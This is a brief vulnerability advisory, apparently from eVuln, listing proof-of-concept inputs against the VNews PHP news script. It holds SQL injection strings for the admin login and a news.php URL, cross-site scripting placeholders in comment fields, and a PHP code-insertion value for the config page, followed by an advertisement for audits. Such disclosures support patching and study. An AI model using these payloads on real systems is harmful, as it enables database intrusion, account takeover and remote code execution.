PoC/Exploit for Multiple Vulnerabilities in VNews

Published Proof of Concept code - Multiple Vulnerabilities in VNews.

Description
Available
Solution
Not available - check vendor's website

SQL Injection Example1:

URL: http://[host]/vnews/admin/admin.php
login: ' and [sql_expression]/*


SQL Injection Example2:

http://[host]/vnews/news.php?co=show&news=99'%20union%20select%201,2,3,4,5,6/*&nom=1


Cross-Site Scripting Example:

URL: http://[host]/vnews/news.php?co=show&news=2&nom=1
Autor: [XSS]
Tresc: [XSS]


PHP Code Insertion Example:

URL: http://[host]/vnews/admin/admin.php?k=config
tlo: #BCCBCD"; [php_code] $aa="

Order PHP Code Testing made by eVuln

Check a website or web application by source code audit of your site made by eVuln team.The work will be done by specialists in website security.

Advisories by vuln type